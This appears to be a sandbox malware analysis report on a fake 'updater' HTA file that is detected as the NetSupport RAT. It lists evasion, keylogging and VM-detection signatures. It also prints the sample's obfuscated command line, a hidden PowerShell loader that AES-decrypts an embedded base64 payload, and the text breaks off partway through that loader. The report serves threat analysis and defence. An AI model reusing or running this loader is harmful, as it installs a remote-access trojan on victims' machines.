Edit tour
Windows
Analysis Report
Client_version(updater).hta
Overview
General Information
Detection
NetSupport RAT
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell drops NetSupport RAT client
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Very long command line found
Suspicious powershell command line found
Suspicious command line found
Powershell drops PE file
Found suspicious powershell code related to unpacking or dynamic code loading
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Yara detected NetSupport remote tool
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Enables security privileges
Yara detected Keylogger Generic
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Classification
- System is w10x64
- mshta.exe (PID: 7016 cmdline:
mshta.exe "C:\Users\ user\Deskt op\Client_ version(up dater).hta " MD5: 7083239CE743FDB68DFC933B7308E80A) - powershell.exe (PID: 5372 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy UnR estricted Start-Proc ess 'cmd.e xe' -Windo wStyle hid den -Argum entList {/ c powershe ll.exe $cw Wl = 'AAAA AAAAAAAAAA AAAAAAACgw 0kTXfDt7Vy GQWkvUWZWo RWwQ3foR84 LKr0hIDBn5 5hU2P/QaH7 UkicLpJA/x SJe84nJJo6 jId61fi3om 68eOCGqV7+ xcDPABW0JX S0BNLSJCDS QlWtLiZ1E8 R3S8ajj1PU mqy7WW9uT2 VoNU9+010d g1zxZzgrNA /hcsUz5YVL blgbKewS5U Qz7KSXbyb+ CIClfTCOKL kZz7/MgCao 3wN7ZeZ9Gb 0u7SLIy7/x gnQsB0l3y8 s69ruJDDmp YRh/RzGp2g f/qgjHb69/ JjuK79SBgo IiM5oVSJ9C pWdthdRf2P 9XkKGkXCBz Jk9SV8CqUO LVMO0s3WHo iyqMsy+pqx J4e/1jontj 7rpiNv74j3 Axt+r8La7T /hMWUnuxUg JbbnYl3FdW 8s+G5JNU2l t2QBmjnyCx dZEhHS37qR 0lcaXLNh7P QHbDGNYuMx nA6GJlxD0f 87eY0FNf6z B/eR50WXPe /DXv/2VOm4 h7EONAY3Py eLB6cFgk5v +vcMZz1G3F Hk+oD59x4T IQ/jSbjrv1 tBgAK4PwwU kiat07QTB8 NB6LWM7kzW o7HjPZyGY+ DvUE1B5PoE FLx54pWq3f eDtfCTSpTb RyLKDvK0nX yFp/G/PV52 3VBKf67xcB p4jYYN0tRK raOrZoUhEr SuWwHHbgsh kWMXIc+l1P JDcozYEeFS zmwlBM2jFb wg0yMOkBZG 4tcB0WxvMT 2cmatL9Cem 3kfSU75JXt Nn4spkMmxg Pemj2lDy7z R1O9HP6kBK K+BjI3gFMb 9Ry8Y1XwIV buRW2UYype CbXN38X9tv obSoJuBZQS e9Wj2TyHbR MHmbRLqU/t Ovc/zQFUwq WAJ35WKeKe i0PA4ioeHd hfZUxES8Dj E0qSOJ3xNC xb/CQtf5HW EiLOpuXHlr HfEvyvBv0b YdrLzqZGBt 9Wnyyl/ULp YqA5jNbUbl mlaCeQgfQq pN9JaEIILd /WRa2PZ15h 459LGu0en5 qVzPNFtLZA +WkpfbXVyy Xlcop8wApu AZTYj70NHY qkevtwO9/5 jrAew4VqzC HOg2AAORrY EcnIOYJ+Vn QVArdafr/6 JOJiUGDfpz qL8agehMgh JttIKhbaTt w3JXM42ZXY lE11kZt5PK 56YJ3z/5o6 URS7i1TdNR 5oycuY5kMy jfU4f53FC6 5Md/65hgrR KTGDjWaUCK RazVMpLHSr OMk4x6nKQC n/LspzRVHt BWxfpvfq8k SxAP1WfuQD n8GZ0z4sbA PyZDZPtsS3 5qdlMo7wjJ Pr5H/lrd0E m7GMqWijrC puf5OnwZEH FaM9MaFLOU AynybcJEor /t4xmDSIhK EzXjSR6X6w RkzE3Ph08i wneJLkiTHU jABGexMKq8 XZtQJNPi3o ecXcDMsJl9 hR3dnSX8d2 uijZ15EyeL G8esgN9njz 3GNN6i6AOa 8nXIKVLOTJ 5fW1Lq6sI9 3oVUmTWNrq lO++5wKQe7 PyfDzXcbF7 x5vIGs0+Mv ugezqSEJIn VTYjx6gcEK W6bnJq0n5p ZU62ZO37pX LEodb7pM4q J+5gTI1GMy 0n94xqmVlT WhenE=';$o sjnGw = 'R VJyQ3FGSFZ XTUVhcnp3S 2ZYcFp2VHh 0RXFUdmJYW HU=';$HYoy Nbe = New- Object 'Sy stem.Secur ity.Crypto graphy.Aes Managed';$ HYoyNbe.Mo de = [Syst em.Securit y.Cryptogr aphy.Ciphe rMode]::EC B;$HYoyNbe .Padding = [System.S ecurity.Cr yptography .PaddingMo de]::Zeros ;$HYoyNbe. BlockSize = 128;$HYo yNbe.KeySi ze = 256;$ HYoyNbe.Ke y = [Syste m.Convert] ::FromBase 64String($ osjnGw);$M ojFO = [Sy stem.Conve rt]::FromB ase64Strin g($cwWl);$ QfSOiZVu = $MojFO[0. .15];$HYoy Nbe.IV = $ QfSOiZVu;$ vcdTgJDLO = $HYoyNbe .CreateDec ryptor();$ kQWgqYwUt = $vcdTgJD LO.Transfo rmFinalBlo ck($MojFO, 16, $MojF O.Length - 16);$HYoy Nbe.Dispos e();$EnAuW Br = New-O bject Syst em.IO.Memo ryStream( , $kQWgqYw Ut );$sQFT am = New-O bject Syst em.IO.Memo ryStream;$ sHlBzafiX